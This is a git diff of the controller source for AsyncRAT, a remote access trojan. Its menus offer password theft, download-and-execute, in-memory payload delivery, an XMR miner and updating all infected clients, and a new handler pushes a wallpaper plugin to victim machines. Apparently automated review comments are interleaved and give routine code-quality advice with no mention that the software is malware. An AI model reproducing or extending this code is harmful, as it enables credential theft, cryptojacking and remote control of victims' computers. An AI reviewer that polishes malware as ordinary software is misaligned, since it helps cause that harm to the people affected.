- this.cLEARToolStripMenuItem.Click += new System.EventHandler(this.CLEARToolStripMenuItem_Click);
- //
- // tabPage3
- //
- this.tabPage3.Controls.Add(this.listView3);
- this.tabPage3.Location = new System.Drawing.Point(4, 29);
- this.tabPage3.Name = "tabPage3";
- this.tabPage3.Size = new System.Drawing.Size(1293, 446);
- this.tabPage3.TabIndex = 2;
- this.tabPage3.Text = "Thumbnail";
- this.tabPage3.UseVisualStyleBackColor = true;
- //
- // listView3
- //
- this.listView3.ContextMenuStrip = this.contextMenuThumbnail;
- this.listView3.Dock = System.Windows.Forms.DockStyle.Fill;
- this.listView3.HideSelection = false;
- this.listView3.LargeImageList = this.ThumbnailImageList;
- this.listView3.Location = new System.Drawing.Point(0, 0);
- this.listView3.Name = "listView3";
- this.listView3.ShowItemToolTips = true;
- this.listView3.Size = new System.Drawing.Size(1293, 446);
- this.listView3.SmallImageList = this.ThumbnailImageList;
- this.listView3.TabIndex = 0;
- this.listView3.UseCompatibleStateImageBehavior = false;
- //
- // contextMenuThumbnail
- //
- this.contextMenuThumbnail.ImageScalingSize = new System.Drawing.Size(24, 24);
- this.contextMenuThumbnail.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
- this.sTARTToolStripMenuItem,
- this.sTOPToolStripMenuItem});
- this.contextMenuThumbnail.Name = "contextMenuStrip2";
- this.contextMenuThumbnail.Size = new System.Drawing.Size(144, 68);
- //
// sTARTToolStripMenuItem
//
this.sTARTToolStripMenuItem.Image = global::Server.Properties.Resources.play_button;
@@ -840,135 +981,6 @@
this.sTOPToolStripMenuItem.Text = "STOP";
this.sTOPToolStripMenuItem.Click += new System.EventHandler(this.STOPToolStripMenuItem_Click);
//
- // ThumbnailImageList
- //
- this.ThumbnailImageList.ColorDepth = System.Windows.Forms.ColorDepth.Depth16Bit;
- this.ThumbnailImageList.ImageSize = new System.Drawing.Size(256, 256);
- this.ThumbnailImageList.TransparentColor = System.Drawing.Color.Transparent;
- //
- // tabPage4
- //
- this.tabPage4.Controls.Add(this.listView4);
- this.tabPage4.Location = new System.Drawing.Point(4, 29);
- this.tabPage4.Name = "tabPage4";
- this.tabPage4.Padding = new System.Windows.Forms.Padding(3);
- this.tabPage4.Size = new System.Drawing.Size(1293, 446);
- this.tabPage4.TabIndex = 3;
- this.tabPage4.Text = "Tasks";
- this.tabPage4.UseVisualStyleBackColor = true;
- //
- // listView4
- //
- this.listView4.BorderStyle = System.Windows.Forms.BorderStyle.None;
- this.listView4.Columns.AddRange(new System.Windows.Forms.ColumnHeader[] {
- this.columnHeader4,
- this.columnHeader5});
- this.listView4.ContextMenuStrip = this.contextMenuTasks;
- this.listView4.Dock = System.Windows.Forms.DockStyle.Fill;
- this.listView4.FullRowSelect = true;
- this.listView4.HideSelection = false;
- this.listView4.Location = new System.Drawing.Point(3, 3);
- this.listView4.Name = "listView4";
- this.listView4.Size = new System.Drawing.Size(1287, 440);
- this.listView4.TabIndex = 0;
- this.listView4.UseCompatibleStateImageBehavior = false;
- this.listView4.View = System.Windows.Forms.View.Details;
- //
- // columnHeader4
- //
- this.columnHeader4.Text = "Task";
- this.columnHeader4.Width = 97;
- //
- // columnHeader5
- //
- this.columnHeader5.Text = "Execution";
- this.columnHeader5.Width = 116;
- //
- // contextMenuTasks
- //
- this.contextMenuTasks.ImageScalingSize = new System.Drawing.Size(24, 24);
- this.contextMenuTasks.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
- this.pASSWORDRECOVERYToolStripMenuItem,
- this.downloadAndExecuteToolStripMenuItem,
- this.sENDFILETOMEMORYToolStripMenuItem1,
- this.minerToolStripMenuItem1,
- this.uPDATEToolStripMenuItem1,
- this.toolStripSeparator4,
- this.dELETETASKToolStripMenuItem});
- this.contextMenuTasks.Name = "contextMenuStrip4";
- this.contextMenuTasks.ShowImageMargin = false;
- this.contextMenuTasks.Size = new System.Drawing.Size(250, 202);
- //
- // pASSWORDRECOVERYToolStripMenuItem
- //
- this.pASSWORDRECOVERYToolStripMenuItem.Name = "pASSWORDRECOVERYToolStripMenuItem";
- this.pASSWORDRECOVERYToolStripMenuItem.Size = new System.Drawing.Size(249, 32);
- this.pASSWORDRECOVERYToolStripMenuItem.Text = "PASSWORD RECOVERY";
- this.pASSWORDRECOVERYToolStripMenuItem.Click += new System.EventHandler(this.PASSWORDRECOVERYToolStripMenuItem_Click);
- //
- // downloadAndExecuteToolStripMenuItem
- //
- this.downloadAndExecuteToolStripMenuItem.Name = "downloadAndExecuteToolStripMenuItem";
- this.downloadAndExecuteToolStripMenuItem.Size = new System.Drawing.Size(249, 32);
- this.downloadAndExecuteToolStripMenuItem.Text = "SEND FILE TO DISK";
- this.downloadAndExecuteToolStripMenuItem.Click += new System.EventHandler(this.DownloadAndExecuteToolStripMenuItem_Click);
- //
- // sENDFILETOMEMORYToolStripMenuItem1
- //
- this.sENDFILETOMEMORYToolStripMenuItem1.Name = "sENDFILETOMEMORYToolStripMenuItem1";
- this.sENDFILETOMEMORYToolStripMenuItem1.Size = new System.Drawing.Size(249, 32);
- this.sENDFILETOMEMORYToolStripMenuItem1.Text = "SEND FILE TO MEMORY";
- this.sENDFILETOMEMORYToolStripMenuItem1.Click += new System.EventHandler(this.SENDFILETOMEMORYToolStripMenuItem1_Click);
- //
- // minerToolStripMenuItem1
- //
- this.minerToolStripMenuItem1.Name = "minerToolStripMenuItem1";
- this.minerToolStripMenuItem1.Size = new System.Drawing.Size(249, 32);
- this.minerToolStripMenuItem1.Text = "XMR MINER";
- this.minerToolStripMenuItem1.Click += new System.EventHandler(this.MinerToolStripMenuItem1_Click);
- //
- // uPDATEToolStripMenuItem1
- //
- this.uPDATEToolStripMenuItem1.Name = "uPDATEToolStripMenuItem1";
- this.uPDATEToolStripMenuItem1.Size = new System.Drawing.Size(249, 32);
- this.uPDATEToolStripMenuItem1.Text = "UPDATE ALL CLIENTS";
- this.uPDATEToolStripMenuItem1.Click += new System.EventHandler(this.UPDATEToolStripMenuItem1_Click);
- //
- // toolStripSeparator4
- //
- this.toolStripSeparator4.Name = "toolStripSeparator4";
- this.toolStripSeparator4.Size = new System.Drawing.Size(246, 6);
- //
- // dELETETASKToolStripMenuItem
- //
- this.dELETETASKToolStripMenuItem.Name = "dELETETASKToolStripMenuItem";
- this.dELETETASKToolStripMenuItem.Size = new System.Drawing.Size(249, 32);
- this.dELETETASKToolStripMenuItem.Text = "DELETE TASK";
- this.dELETETASKToolStripMenuItem.Click += new System.EventHandler(this.DELETETASKToolStripMenuItem_Click);
- //
- // performanceCounter1
- //
- this.performanceCounter1.CategoryName = "Processor";
- this.performanceCounter1.CounterName = "% Processor Time";
- this.performanceCounter1.InstanceName = "_Total";
- //
- // performanceCounter2
- //
- this.performanceCounter2.CategoryName = "Memory";
- this.performanceCounter2.CounterName = "% Committed Bytes In Use";
- //
- // notifyIcon1
- //
- this.notifyIcon1.Icon = ((System.Drawing.Icon)(resources.GetObject("notifyIcon1.Icon")));
- this.notifyIcon1.Text = "AsyncRAT";
- this.notifyIcon1.Visible = true;
- //
- // TimerTask
- //
- this.TimerTask.Enabled = true;
- this.TimerTask.Interval = 5000;
- this.TimerTask.Tick += new System.EventHandler(this.TimerTask_Tick);
- //
// Form1
//
this.AutoScaleDimensions = new System.Drawing.SizeF(9F, 20F);
@@ -1027,7 +1039,7 @@
private System.Windows.Forms.ColumnHeader columnHeader2;
private System.Diagnostics.PerformanceCounter performanceCounter1;
private System.Diagnostics.PerformanceCounter performanceCounter2;
- public System.Windows.Forms.ColumnHeader lv_prefor;
+ public System.Windows.Forms.ColumnHeader lv_act;
private System.Windows.Forms.ToolStripMenuItem aBOUTToolStripMenuItem;
private System.Windows.Forms.TabPage tabPage3;
private System.Windows.Forms.ContextMenuStrip contextMenuThumbnail;
@@ -1103,6 +1115,7 @@
private System.Windows.Forms.ToolStripMenuItem minerToolStripMenuItem1;
private System.Windows.Forms.ToolStripMenuItem runToolStripMenuItem2;
private System.Windows.Forms.ToolStripMenuItem stopToolStripMenuItem1;
+ private System.Windows.Forms.ToolStripMenuItem setWallpaperToolStripMenuItem;
}
}
diff --git a/AsyncRAT-C#/Server/Forms/Form1.cs b/AsyncRAT-C#/Server/Forms/Form1.cs
index 205d6ed..4988db6 100644
--- a/AsyncRAT-C#/Server/Forms/Form1.cs
+++ b/AsyncRAT-C#/Server/Forms/Form1.cs
@@ -1062,6 +1062,42 @@ namespace Server
}
}
+ private void setWallpaperToolStripMenuItem_Click(object sender, EventArgs e)
+ {
+ try
+ {
+ if (listView1.SelectedItems.Count > 0)
+ {
+ using (OpenFileDialog openFileDialog = new OpenFileDialog())
+ {
+ openFileDialog.Filter = "All Graphics Types|*.bmp;*.jpg;*.jpeg;*.png";
+ if (openFileDialog.ShowDialog() == DialogResult.OK)
+ {
+ MsgPack packet = new MsgPack();
+ packet.ForcePathObject("Packet").AsString = "wallpaper";
+ packet.ForcePathObject("Image").SetAsBytes(File.ReadAllBytes(openFileDialog.FileName));
+ packet.ForcePathObject("Exe").AsString = Path.GetExtension(openFileDialog.FileName);
+
+ MsgPack msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "plugin";
+ msgpack.ForcePathObject("Dll").AsString = (GetHash.GetChecksum(@"Plugins\Extra.dll"));
+ msgpack.ForcePathObject("Msgpack").SetAsBytes(packet.Encode2Bytes());
+
+ foreach (Clients client in GetSelectedClients())
+ {
+ ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes());
+ }
+ }
+ }
+ }
+ }
+ catch (Exception ex)
+ {
+ MessageBox.Show(ex.Message);
+ return;
+ }
+ }
+
#endregion
#region System Client
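Review bot: In `setWallpaperToolStripMenuItem_Click` the image's file extension is sent under the key `"Exe"`, which reads like an executable marker rather than an extension; a comment such as `// "Exe" holds the image file extension returned by Path.GetExtension, not an executable` would document the packet layout. `File.ReadAllBytes(openFileDialog.FileName)` loads the whole file on the UI thread with no size check, and the dialog filter is the only restriction on what is read, so a length check before building the packet is worth adding. When `listView1.SelectedItems.Count` is 0 the handler returns silently, and the trailing `return;` in the `catch` is redundant.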
@@ -1708,6 +1744,5 @@ namespace Server
[DllImport("uxtheme", CharSet = CharSet.Unicode)]
public static extern int SetWindowTheme(IntPtr hWnd, string textSubAppName, string textSubIdList);
-
}
}
diff --git a/AsyncRAT-C#/Server/Handle Packet/HandleListView.cs b/AsyncRAT-C#/Server/Handle Packet/HandleListView.cs
index 74e44fb..7e90532 100644
--- a/AsyncRAT-C#/Server/Handle Packet/HandleListView.cs
+++ b/AsyncRAT-C#/Server/Handle Packet/HandleListView.cs
@@ -78,14 +78,7 @@ namespace Server.Handle_Packet
client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("Admin").AsString);
client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("Antivirus").AsString);
client.LV.SubItems.Add("0000 MS");
- try
- {
- client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("Performance").AsString.Replace("MINER 0", "MINER Offline").Replace("MINER 1", "MINER Online"));
- }
- catch
- {
- client.LV.SubItems.Add("??");
- }
+ client.LV.SubItems.Add("...");
client.LV.ToolTipText = "[Path] " + unpack_msgpack.ForcePathObject("Path").AsString + Environment.NewLine;
client.LV.ToolTipText += "[Pastebin] " + unpack_msgpack.ForcePathObject("Pastebin").AsString;
client.ID = unpack_msgpack.ForcePathObject("HWID").AsString;
diff --git a/AsyncRAT-C#/Server/Handle Packet/HandlePing.cs b/AsyncRAT-C#/Server/Handle Packet/HandlePing.cs
index 14fd45f..fa5e7f7 100644
--- a/AsyncRAT-C#/Server/Handle Packet/HandlePing.cs
+++ b/AsyncRAT-C#/Server/Handle Packet/HandlePing.cs
@@ -18,7 +18,7 @@ namespace Server.Handle_Packet
ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes());
lock (Settings.LockListviewClients)
if (client.LV != null)
- client.LV.SubItems[Program.form1.lv_prefor.Index].Text = unpack_msgpack.ForcePathObject("Message").AsString.Replace("MINER 0", "MINER Offline").Replace("MINER 1", "MINER Online");
+ client.LV.SubItems[Program.form1.lv_act.Index].Text = unpack_msgpack.ForcePathObject("Message").AsString;
else
Debug.WriteLine("Temp socket pinged server");
}
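Review bot: The new assignment writes the peer-supplied `Message` string into `client.LV.SubItems[...]` unchanged, so the text shown in the list view has whatever length and content the remote side sent. Treat the field as untrusted input and bound it before display (cap the length, strip control characters), or at least mark it with `// Message is peer-controlled text; not validated before display`. The `lock` / `if` / `else` chain has no braces, which makes the extent of the locked region easy to misread. The enclosing method starts outside the hunk.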
diff --git a/AsyncRAT-C#/Server/Properties/Resources.Designer.cs b/AsyncRAT-C#/Server/Properties/Resources.Designer.cs
index 409e7b1..ff4cb87 100644
--- a/AsyncRAT-C#/Server/Properties/Resources.Designer.cs
+++ b/AsyncRAT-C#/Server/Properties/Resources.Designer.cs
@@ -200,6 +200,16 @@ namespace Server.Properties {
}
}
+ ///
+ /// Looks up a localized resource of type System.Drawing.Bitmap.
+ ///
+ internal static System.Drawing.Bitmap iconfinder_32_171485__1_ {
+ get {
+ object obj = ResourceManager.GetObject("iconfinder_32_171485 (1)", resourceCulture);
+ return ((System.Drawing.Bitmap)(obj));
+ }
+ }
+
///
/// Looks up a localized resource of type System.Drawing.Bitmap.
///
diff --git a/AsyncRAT-C#/Server/Properties/Resources.resx b/AsyncRAT-C#/Server/Properties/Resources.resx
index 3e3f7b4..81b3dd4 100644
--- a/AsyncRAT-C#/Server/Properties/Resources.resx
+++ b/AsyncRAT-C#/Server/Properties/Resources.resx
@@ -181,9 +181,6 @@
..\Resources\uac.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
-
- ..\Resources\process.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
-
..\Resources\pc.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
@@ -193,6 +190,9 @@
..\Resources\info.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
+
+ ..\Resources\keyboard.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
+
..\Resources\Miscellaneous.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
@@ -202,6 +202,9 @@
..\Resources\xmr.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
+
+ ..\Resources\keyboard-on.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
+
..\Resources\msgbox.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
@@ -211,8 +214,8 @@
..\Resources\extra.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
-
- ..\Resources\client.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
+
+ ..\Resources\xmrig.bin;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
..\Resources\monitoring-system.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
@@ -220,14 +223,17 @@
..\Resources\webcam.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
+
+ ..\Resources\netstat.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
+
..\Resources\tomem.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
..\Resources\ddos.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
-
- ..\Resources\netstat.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
+
+ ..\Resources\process.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
..\Resources\save-image2.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
@@ -244,16 +250,13 @@
..\Resources\chat.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
-
- ..\Resources\xmrig.bin;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
+
+ ..\Resources\client.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
..\Resources\7z.dll;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
-
- ..\Resources\keyboard.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
-
-
- ..\Resources\keyboard-on.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
+
+ ..\Resources\iconfinder_32_171485 (1).png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
\ No newline at end of file
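Review bot: The entry added at the end of this hunk keeps a browser-download file name, `..\Resources\iconfinder_32_171485 (1).png`, so the accessor generated in Resources.Designer.cs becomes `iconfinder_32_171485__1_`, which tells a reader nothing about where the image is used. Rename the file and the resource key to something that describes the icon before regenerating the designer file, for example `..\Resources\<descriptive-name>.png`. The remaining changes in this file appear to only move existing entries (process.png, netstat.png, client.png, keyboard.png, keyboard-on.png, xmrig.bin), which hides the one real addition. The file also now ends without a trailing newline.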
diff --git a/AsyncRAT-C#/Server/Resources/iconfinder_32_171485 (1).png b/AsyncRAT-C#/Server/Resources/iconfinder_32_171485 (1).png
new file mode 100644
index 0000000..f7fac9b
Binary files /dev/null and b/AsyncRAT-C#/Server/Resources/iconfinder_32_171485 (1).png differ
diff --git a/AsyncRAT-C#/Server/Server.csproj b/AsyncRAT-C#/Server/Server.csproj
index 8d8b037..4347508 100644
--- a/AsyncRAT-C#/Server/Server.csproj
+++ b/AsyncRAT-C#/Server/Server.csproj
@@ -350,6 +350,7 @@
+